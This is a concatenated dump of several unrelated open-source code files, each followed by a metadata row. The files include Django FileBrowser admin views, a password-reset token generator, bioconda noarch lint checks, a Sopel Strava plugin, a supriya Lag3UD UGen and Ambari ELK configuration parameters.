description='CLI Tool for building FIRST Robotics (FRC) C++ projects w/ WPILib',
long_description=__doc__,
packages=find_packages(exclude=['tests']),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
'frcbuild = frcbuild.cli:main',
],
},
classifiers=[
# As from http://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
# 'Development Status :: 3 - Alpha',
'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: MacOS',
'Operating System :: Unix',
'Operating System :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| gpl-2.0 | 2,587,404,946,052,572,700 | 33.104167 | 84 | 0.598045 | false |
phillc/django-filebrowser-fork | views.py | 1 | 20390 | # coding: utf-8
from django.shortcuts import render_to_response
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
from time import gmtime, strftime, localtime, mktime, time
import os, string, ftplib, re, Image, decimal
from django import forms
# get settings
from filebrowser.fb_settings import *
# get functions
from filebrowser.functions import _get_path, _get_subdir_list, _get_dir_list, _get_breadcrumbs, _get_sub_query, _get_query, _get_filterdate, _get_filesize, _make_filedict, _get_settings_var, _handle_file_upload, _get_file_type, _make_image_thumbnail, _image_generator, _image_crop_generator, _is_image_version
# get forms
from filebrowser.forms import MakeDirForm, RenameForm, UploadForm, BaseUploadFormSet
def index(request, dir_name=None):
"""
Show list of files on a server-directory.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'change_total': 0, 'imagegenerator_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
dir_list = os.listdir(os.path.join(PATH_SERVER, path))
file_list = []
for file in dir_list:
# VARIABLES
var_filesize_long = '' # filesize
var_filesize_str = '' # filesize in B, kB, MB
var_date = '' # YYYY-MM-dd
var_path_thumb = '' # path to thumbnail
var_link = '' # link to file (using URL_WWW), link to folder (using URL_ADMIN)
var_select_link = '' # link to file (using URL_WWW)
var_file_extension = '' # see EXTENSIONS in fb_settings.py
var_file_type = '' # Folder, Image, Video, Document, Sound, Code, ...
var_image_dimensions = '' # Image Dimensions (width, height)
var_thumb_dimensions = '' # Thumbnail Dimensions (width, height)
var_flag_makethumb = False # True, if Image has no Thumbnail.
var_flag_deletedir = False # True, if Directory is empty.
var_image_version = False # True, if Image is generated with ImageGenerator.
# DON'T DISPLAY FILES STARTING WITH %THUMB_PREFIX% OR "."
if re.compile(THUMB_PREFIX, re.M).search(file) or \
file.startswith('.'): # ... or with a '.' \
continue
else:
results_var['results_total'] += 1
# SIZE
var_filesize_long = os.path.getsize(os.path.join(PATH_SERVER, path, file))
var_filesize_str = _get_filesize(var_filesize_long)
# DATE / TIME
date_time = os.path.getmtime(os.path.join(PATH_SERVER, path, file))
var_date = strftime("%Y-%m-%d", gmtime(date_time))
# EXTENSION / FLAG_EMPTYDIR / DELETE_TOTAL
if os.path.isfile(os.path.join(PATH_SERVER, path, file)): # file
var_file_extension = os.path.splitext(file)[1].lower()
var_select_link = var_link = "%s%s%s" % (URL_WWW, path, file)
elif os.path.isdir(os.path.join(PATH_SERVER, path, file)): # folder
var_link = "%s%s%s" % (URL_ADMIN, path, file)
var_select_link = "%s%s%s/" % (URL_WWW, path, file)
if not os.listdir(os.path.join(PATH_SERVER, path, file)):
var_flag_deletedir = True # only empty directories are allowed to be deleted
# FILETYPE / COUNTER
var_file_type = _get_file_type(file)
if var_file_type:
counter[var_file_type] += 1
# DIMENSIONS / MAKETHUMB / SELECT
if var_file_type == 'Image':
try:
im = Image.open(os.path.join(PATH_SERVER, path, file))
var_image_dimensions = im.size
var_path_thumb = "%s%s%s%s" % (URL_WWW, path, THUMB_PREFIX, file)
try:
thumb = Image.open(os.path.join(PATH_SERVER, path, THUMB_PREFIX + file))
var_thumb_dimensions = thumb.size
except:
# if thumbnail does not exist, show makethumb-Icon instead.
var_path_thumb = settings.URL_FILEBROWSER_MEDIA + 'img/filebrowser_Thumb.gif'
var_flag_makethumb = True
except:
# if image is corrupt, change filetype to not defined
var_file_type = ''
# check, if image is generated with ImageGenerator
var_image_version = _is_image_version(file)
if var_image_version == False:
results_var['imagegenerator_total'] += 1
# FILTER / SEARCH
flag_extend = False
if query['filter_type'] != '' and query['filter_date'] != '' and var_file_type == query['filter_type'] and _get_filterdate(query['filter_date'], date_time):
flag_extend = True
elif query['filter_type'] != '' and query['filter_date'] == '' and var_file_type == query['filter_type']:
flag_extend = True
elif query['filter_type'] == '' and query['filter_date'] != '' and _get_filterdate(query['filter_date'], date_time):
flag_extend = True
elif query['filter_type'] == '' and query['filter_date'] == '':
flag_extend = True
if query['q'] and not re.compile(query['q'].lower(), re.M).search(file.lower()):
flag_extend = False
# APPEND FILE_LIST
if flag_extend == True:
file_list.append([file, var_filesize_long, var_filesize_str, var_date, var_path_thumb, var_link, var_select_link, var_file_extension, var_file_type, var_image_dimensions, var_thumb_dimensions, file.lower(), var_flag_makethumb, var_flag_deletedir, var_image_version])
# SORT LIST
file_list.sort(lambda x, y: cmp(x[int(query['o'])], y[int(query['o'])]))
if query['ot'] == "desc":
file_list.reverse()
# MAKE DICTIONARY (for better readability in the templates)
file_dict = _make_filedict(file_list)
# RESULTS
results_var['results_current'] = len(file_list)
for file in file_dict:
if file['file_type'] == 'Image':
results_var['change_total'] += 1
if file['file_type'] != 'Folder':
results_var['delete_total'] += 1
elif file['file_type'] == 'Folder' and file['flag_deletedir'] == True:
results_var['delete_total'] += 1
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file_dict': file_dict,
'results_var': results_var,
'query': query,
'counter': counter,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'title': _('FileBrowser'),
'root_path': URL_HOME,
}, context_instance=Context(request))
index = staff_member_required(never_cache(index))
def mkdir(request, dir_name=None):
"""
Make directory
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if request.method == 'POST':
form = MakeDirForm(PATH_SERVER, path, request.POST)
if form.is_valid():
server_path = os.path.join(PATH_SERVER, path, form.cleaned_data['dir_name'].lower())
try:
os.mkdir(server_path)
os.chmod(server_path, 0775)
# MESSAGE & REDIRECT
msg = _('The directory %s was successfully created.') % (form.cleaned_data['dir_name'].lower())
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
return HttpResponseRedirect(URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop'])
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating directory.')])
else:
form = MakeDirForm(PATH_SERVER, path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Make Directory'),
'title': _('Make directory'),
'root_path': URL_HOME,
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request, dir_name=None):
"""
Multipe Upload.
"""
from django.forms.formsets import formset_factory
path = _get_path(dir_name)
query = _get_query(request.GET)
# PIL's Error "Suspension not allowed here" work around:
# s. http://mail.python.org/pipermail/image-sig/1999-August/000816.html
import ImageFile
ImageFile.MAXBLOCK = IMAGE_MAXBLOCK # default is 64k
UploadFormSet = formset_factory(UploadForm, formset=BaseUploadFormSet, extra=5)
if request.method == 'POST':
formset = UploadFormSet(data=request.POST, files=request.FILES, path_server=PATH_SERVER, path=path)
if formset.is_valid():
for cleaned_data in formset.cleaned_data:
if cleaned_data:
# UPLOAD FILE
_handle_file_upload(PATH_SERVER, path, cleaned_data['file'])
if _get_file_type(cleaned_data['file'].name) == "Image":
# MAKE THUMBNAIL
_make_image_thumbnail(PATH_SERVER, path, cleaned_data['file'].name)
# IMAGE GENERATOR
if FORCE_GENERATOR or (cleaned_data['use_image_generator'] and (IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "")):
_image_generator(PATH_SERVER, path, cleaned_data['file'].name)
# GENERATE CROPPED/RECTANGULAR IMAGE
if FORCE_GENERATOR or (cleaned_data['use_image_generator'] and IMAGE_CROP_GENERATOR != ""):
_image_crop_generator(PATH_SERVER, path, cleaned_data['file'].name)
# MESSAGE & REDIRECT
msg = _('Upload successful.')
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the uploaded files on top of the list
redirect_url = URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop']
return HttpResponseRedirect(redirect_url)
else:
formset = UploadFormSet(path_server=PATH_SERVER, path=path)
return render_to_response('filebrowser/upload.html', {
'formset': formset,
'dir': dir_name,
'query': _get_query(request.GET),
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Multiple Upload'),
'title': _('Select files to upload'),
'root_path': URL_HOME,
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
def makethumb(request, dir_name=None, file_name=None):
"""
Make Thumbnail(s) for existing Image or Directory
This is useful if someone uploads images via FTP, not using the
upload functionality of the FileBrowser.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if file_name:
# MAKE THUMB FOR SINGLE IMAGE
file_path = os.path.join(PATH_SERVER, path, file_name)
if os.path.isfile(file_path):
_make_image_thumbnail(PATH_SERVER, path, file_name)
else:
# MAKE THUMBS FOR WHOLE DIRECTORY
dir_path = os.path.join(PATH_SERVER, path)
dir_list = os.listdir(dir_path)
for file in dir_list:
if os.path.isfile(os.path.join(PATH_SERVER, path, file)) and not os.path.isfile(os.path.join(PATH_SERVER, path, THUMB_PREFIX + file)) and not re.compile(THUMB_PREFIX, re.M).search(file) and _get_file_type(file) == "Image":
_make_image_thumbnail(PATH_SERVER, path, file)
# MESSAGE & REDIRECT
msg = _('Thumbnail creation successful.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_str_total'])
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
makethumb = staff_member_required(never_cache(makethumb))
def delete(request, dir_name=None):
"""
Delete existing File/Directory.
If file is an Image, also delete thumbnail.
When trying to delete a directory, the directory has to be empty.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
msg = ""
if request.GET:
if request.GET.get('type') != "Folder":
server_path = os.path.join(PATH_SERVER, path, request.GET.get('filename'))
try:
# DELETE FILE
os.unlink(server_path)
# TRY DELETING THUMBNAIL
path_thumb = os.path.join(PATH_SERVER, path, THUMB_PREFIX + request.GET.get('filename'))
try:
os.unlink(path_thumb)
except OSError:
pass
# TRY DELETING IMAGE_VERSIONS
versions_path = os.path.join(PATH_SERVER, path, request.GET.get('filename').replace(".", "_").lower() + IMAGE_GENERATOR_DIRECTORY)
try:
dir_list = os.listdir(versions_path)
for file in dir_list:
file_path = os.path.join(versions_path, file)
os.unlink(file_path)
os.rmdir(versions_path)
except OSError:
pass
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (request.GET.get('filename').lower())
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_nodelete'])
except OSError:
# todo: define error message
msg = OSError
else:
server_path = os.path.join(PATH_SERVER, path, request.GET.get('filename'))
try:
os.rmdir(server_path)
# MESSAGE & REDIRECT
msg = _('The directory %s was successfully deleted.') % (request.GET.get('filename').lower())
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_nodelete'])
except OSError:
# todo: define error message
msg = OSError
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file': request.GET.get('filename', ''),
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
def rename(request, dir_name=None, file_name=None):
"""
Rename existing File/Directory.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if os.path.isfile(os.path.join(PATH_SERVER, path, file_name)): # file
file_type = _get_file_type(file_name)
file_extension = os.path.splitext(file_name)[1].lower()
else:
file_extension = ""
file_type = ""
if request.method == 'POST':
form = RenameForm(PATH_SERVER, path, file_extension, request.POST)
if form.is_valid():
old_path = os.path.join(PATH_SERVER, path, file_name)
new_path = os.path.join(PATH_SERVER, path, request.POST.get('name').lower() + file_extension)
try:
os.rename(old_path, new_path)
# RENAME IMAGE_THUMBNAILS
if file_type == 'Image':
old_thumb_path = os.path.join(PATH_SERVER, path, THUMB_PREFIX + file_name)
new_thumb_path = os.path.join(PATH_SERVER, path, THUMB_PREFIX + request.POST.get('name').lower() + file_extension)
try:
os.rename(old_thumb_path, new_thumb_path)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error renaming Thumbnail.')])
# RENAME IMAGE VERSIONS? TOO MUCH MAGIC?
# MESSAGE & REDIRECT
if not form.errors:
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new stuff on top of the list
return HttpResponseRedirect(URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop'])
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(PATH_SERVER, path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Rename'),
'title': _('Rename "%s"') % file_name,
'root_path': URL_HOME,
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def generateimages(request, dir_name=None, file_name=None):
"""
Generate Image Versions for existing singe Image or a whole Directory.
This is useful if someone uploads images via FTP, not using the
upload functionality of the FileBrowser.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if file_name:
# GENERATE IMAGES
if IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "":
_image_generator(PATH_SERVER, path, file_name)
# GENERATE CROPPED/RECTANGULAR IMAGE
if IMAGE_CROP_GENERATOR != "":
_image_crop_generator(PATH_SERVER, path, file_name)
else:
# GENERATE IMAGES FOR WHOLE DIRECTORY
dir_path = os.path.join(PATH_SERVER, path)
dir_list = os.listdir(dir_path)
for file in dir_list:
if os.path.isfile(os.path.join(PATH_SERVER, path, file)) and not re.compile(THUMB_PREFIX, re.M).search(file) and _get_file_type(file) == "Image":
# GENERATE IMAGES
if IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "":
_image_generator(PATH_SERVER, path, file)
# GENERATE CROPPED/RECTANGULAR IMAGE
if IMAGE_CROP_GENERATOR != "":
_image_crop_generator(PATH_SERVER, path, file)
# MESSAGE & REDIRECT
msg = _('Successfully generated Images.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_str_total'])
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
makethumb = staff_member_required(never_cache(makethumb))
| bsd-3-clause | -4,157,568,425,170,416,600 | 43.714912 | 309 | 0.582688 | false |
Dev-Cloud-Platform/Dev-Cloud | dev_cloud/cc1/src/clm/utils/tokens.py | 1 | 2164 | # -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.clm.utils.tokens
@author Piotr Wójcik
@date 21.09.2010
"""
from django.utils.http import int_to_base36, base36_to_int
class PasswordResetTokenGenerator(object):
"""
Class for generating tokens during password reset.
"""
def make_token(self, user):
"""
@parameter{user,User} instance of the User whom Token should be
generated for
@returns{string} Token with timestamp generated for specified User
"""
import hashlib
h = hashlib.sha1(user.password +
unicode(user.last_login_date) +
unicode(user.id)).hexdigest()[::2]
return "%s-%s" % (int_to_base36(user.id), h)
def check_token(self, user, token):
"""
@parameter{user,User} instance of the User whose Token should be
checked.
@parameter{token,string} Token to check
@returns{bool} @val{true} for right Token, @val{false} for wrong Token
"""
try:
ts_b36 = token.split("-")[0]
except ValueError:
return False
try:
uid = base36_to_int(ts_b36)
except ValueError:
return False
# Check that the uid has not been tampered with
if uid != user.id:
return False
if self.make_token(user) != token:
return False
return True
default_token_generator = PasswordResetTokenGenerator()
| apache-2.0 | -4,509,081,930,120,977,400 | 27.84 | 78 | 0.626445 | false |
bioconda/bioconda-utils | bioconda_utils/lint/check_noarch.py | 1 | 4912 | """Use of ``noarch`` and ``skip``
When to use ``noarch`` and when to use ``skip`` or pin the interpreter
is non-intuitive and idiosynractic due to ``conda`` legacy
behavior. These checks aim at getting the right settings.
"""
import re
from . import LintCheck, ERROR, WARNING, INFO
# Noarch or not checks:
#
# - Python packages that use no compiler should be
# a) Marked ``noarch: python``
# b) Not use ``skip: True # [...]`` except for osx/linux,
# but use ``- python [<>]3``
# - Python packages that use a compiler should be
# a) NOT marked ``noarch: python``
# b) Not use ``- python [<>]3``,
# but use ``skip: True # [py[23]k]``
class should_be_noarch_python(LintCheck):
"""The recipe should be build as ``noarch``
Please add::
build:
noarch: python
Python packages that don't require a compiler to build are
normally architecture independent and go into the ``noarch``
subset of packages.
"""
def check_deps(self, deps):
if 'python' not in deps:
return # not a python package
if all('build' not in loc for loc in deps['python']):
return # only uses python in run/host
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', None) == 'python':
return # already marked noarch: python
self.message(section='build', data=True)
def fix(self, _message, _data):
self.recipe.set('build/noarch', 'python')
return True
class should_be_noarch_generic(LintCheck):
"""The recipe should be build as ``noarch``
Please add::
build:
noarch: generic
Packages that don't require a compiler to build are normally
architecture independent and go into the ``noarch`` subset of
packages.
"""
requires = ['should_be_noarch_python']
def check_deps(self, deps):
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', None):
return # already marked noarch
self.message(section='build', data=True)
def fix(self, _message, _data):
self.recipe.set('build/noarch', 'generic')
return True
class should_not_be_noarch_compiler(LintCheck):
"""The recipe uses a compiler but is marked noarch
Recipes using a compiler should not be marked noarch.
Please remove the ``build: noarch:`` section.
"""
def check_deps(self, deps):
if not any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
self.message(section='build/noarch')
class should_not_be_noarch_skip(LintCheck):
"""The recipe uses ``skip: True`` but is marked noarch
Recipes marked as ``noarch`` cannot use skip.
"""
def check_recipe(self, recipe):
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
if self.recipe.get('build/skip', False) is False:
return # no skip or skip=False
self.message(section='build/noarch')
class should_not_use_skip_python(LintCheck):
"""The recipe should be noarch and not use python based skipping
Please use::
requirements:
build:
- python >3 # or <3
run:
- python >3 # or <3
The ``build: skip: True`` feature only works as expected for
packages built specifically for each "platform" (i.e. Python
version and OS). This package should be ``noarch`` and not use
skips.
"""
bad_skip_terms = ('py2k', 'py3k', 'python')
def check_deps(self, deps):
if 'python' not in deps:
return # not a python package
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/skip', None) is None:
return # no build: skip: section
skip_line = self.recipe.get_raw('build/skip')
if not any(term in skip_line for term in self.bad_skip_terms):
return # no offending skip terms
self.message(section='build/skip')
class should_not_be_noarch_source(LintCheck):
"""The recipe uses per platform sources and cannot be noarch
You are downloading different upstream sources for each
platform. Remove the noarch section or use just one source for all
platforms.
"""
_pat = re.compile(r'# +\[.*\]')
def check_source(self, source, section):
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
# just search the entire source entry for a comment
if self._pat.search(self.recipe.get_raw(f"{section}")):
self.message(section)
| mit | 7,150,494,295,863,050,000 | 30.487179 | 70 | 0.617875 | false |
normcyr/sopel-modules | strava.py | 1 | 1773 | #!/usr/bin/python3
'''
strava.py - strava activity module
author: Norm1 <[email protected]>
found here: https://github.com/normcyr/sopel-modules
'''
import requests
from bs4 import BeautifulSoup
from sopel.module import commands, example
def fetch_new_activity(url):
r = requests.get(url)
if r.status_code == 200:
return(r)
else:
print('URL error')
def make_soup(r):
soup = BeautifulSoup(r.text, 'html.parser')
return(soup)
def retreive_activity_info(soup):
athlete_name = soup.find('h2', {'class': 'bottomless'}).text.strip()
activity_title = soup.find('div', {'class': 'hgroup'}).text.strip()
activity_type = soup.find('div', {'class': 'activity-type-date'}).find('strong').text.strip()
activity_distance = soup.find('li', {'class': 'distance'}).find('strong').text.strip()
activity_info = {'Name': athlete_name, 'Title': activity_title, 'Type': activity_type, 'Distance': activity_distance}
return(activity_info)
@commands('strava')
@example('.strava https://www.strava.com/activities/1474462480')
def strava(bot, trigger):
'''.strava <activity_url> - Retreive the Strava data from an activity. This assumes that the activity is public.'''
url = trigger.group(2)
#url = 'https://www.strava.com/activities/1474462480'
try:
r = fetch_new_activity(url)
soup = make_soup(r)
activity_info = retreive_activity_info(soup)
bot.say('{} just did a {} {}.'.format(activity_info['Name'], activity_info['Distance'], activity_info['Type']))
#print('{} just did a {} {}.'.format(activity_info['Name'], activity_info['Distance'], activity_info['Type']))
except:
return bot.say("No URL given")
#if __name__ == '__main__':
#strava()
| gpl-3.0 | -6,875,788,661,379,818,000 | 29.568966 | 121 | 0.64467 | false |
andrewyoung1991/supriya | supriya/tools/ugentools/Lag3UD.py | 1 | 4787 | # -*- encoding: utf-8 -*-
from supriya.tools.synthdeftools.CalculationRate import CalculationRate
from supriya.tools.ugentools.Filter import Filter
class Lag3UD(Filter):
r'''An up/down exponential lag generator.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = 'Filter UGens'
__slots__ = ()
_ordered_input_names = (
'source',
'lag_time_u',
'lag_time_d',
)
_valid_rates = (
CalculationRate.AUDIO,
CalculationRate.CONTROL,
)
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
Filter.__init__(
self,
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
r'''Constructs an audio-rate Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
return ugen
# def coeffs(): ...
@classmethod
def kr(
cls,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
r'''Constructs a control-rate Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.kr(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
return ugen
# def magResponse(): ...
# def magResponse2(): ...
# def magResponse5(): ...
# def magResponseN(): ...
# def scopeResponse(): ...
### PUBLIC PROPERTIES ###
@property
def lag_time_d(self):
r'''Gets `lag_time_d` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.lag_time_d
0.1
Returns ugen input.
'''
index = self._ordered_input_names.index('lag_time_d')
return self._inputs[index]
@property
def lag_time_u(self):
r'''Gets `lag_time_u` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.lag_time_u
0.1
Returns ugen input.
'''
index = self._ordered_input_names.index('lag_time_u')
return self._inputs[index]
@property
def source(self):
r'''Gets `source` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
'''
index = self._ordered_input_names.index('source')
return self._inputs[index] | mit | 4,332,414,997,754,665,500 | 22.820896 | 71 | 0.448715 | false |
maweina/ambari-elk-service | src/package/scripts/params.py | 1 | 6226 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#from resource_management.libraries.functions.version import format_hdp_stack_version, compare_versions
from resource_management import *
import status_params
# server configurations
config = Script.get_config()
logstash_user = config['configurations']['logstash-env']['logstash_user']
logstash_user_group = config['configurations']['logstash-env']['logstash_user_group']
elastic_user = config['configurations']['elastic-env']['elastic_user']
elastic_user_group = config['configurations']['elastic-env']['elastic_user_group']
kibana_user = config['configurations']['kibana-env']['kibana_user']
kibana_user_group = config['configurations']['kibana-env']['kibana_user_group']
elastic_home = "/usr/share/elasticsearch"
elastic_plugins = "/usr/share/elasticsearch/plugins"
elastic_bin = "/usr/share/elasticsearch/bin"
elastic_script_dir = "/etc/elasticsearch/scripts"
elastic_conf_dir = "/etc/elasticsearch"
elastic_data_dir = config['configurations']['elasticsearch-site']['path.data']
elastic_log_dir = config['configurations']['elasticsearch-site']['path.logs']
logstash_home = "/opt/logstash"
logstash_bin = "/opt/logstash/bin"
logstash_conf_dir = "/etc/logstash/conf.d"
logstash_log_dir = "/var/log/logstash"
logstash_sincedb_path = format("{logstash_log_dir}/.sincedb2")
kibana_home = "/opt/kibana"
kibana_bin = "/opt/kibana/bin"
kibana_conf_dir = "/opt/kibana/config"
kibana_log_dir = config['configurations']['kibana-site']['logging.dest']
logstash_pid_dir = status_params.logstash_pid_dir
logstash_pid_file = status_params.logstash_pid_file
elastic_pid_dir = status_params.elastic_pid_dir
elastic_pid_file = status_params.elastic_pid_file
kibana_pid_dir = status_params.kibana_pid_dir
kibana_pid_file = status_params.kibana_pid_file
hdfs_log_dir_prefix = ""
hdfs_user = ""
if 'hadoop-env' in config['configurations']:
if 'hdfs_log_dir_prefix' in config['configurations']['hadoop-env']:
hdfs_log_dir_prefix = config['configurations']['hadoop-env']['hdfs_log_dir_prefix']
if 'hdfs_user' in config['configurations']['hadoop-env']:
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
yarn_log_dir_prefix = ""
yarn_user = ""
if 'yarn-env' in config['configurations']:
if 'yarn_log_dir_prefix' in config['configurations']['yarn-env']:
yarn_log_dir_prefix = config['configurations']['yarn-env']['yarn_log_dir_prefix']
if 'yarn_user' in config['configurations']['yarn-env']:
yarn_user = config['configurations']['yarn-env']['yarn_user']
hbase_log_dir = ""
if 'hbase-env' in config['configurations'] and 'hbase_log_dir' in config['configurations']['hbase-env']:
hbase_log_dir = config['configurations']['hbase-env']['hbase_log_dir']
zk_log_dir = ""
if 'zookeeper-env' in config['configurations'] and 'zk_log_dir' in config['configurations']['zookeeper-env']:
zk_log_dir = config['configurations']['zookeeper-env']['zk_log_dir']
hive_log_dir = ""
webhcat_log_dir = ""
if 'hive-env' in config['configurations']:
if 'hive_log_dir' in config['configurations']['hive-env']:
hive_log_dir = config['configurations']['hive-env']['hive_log_dir']
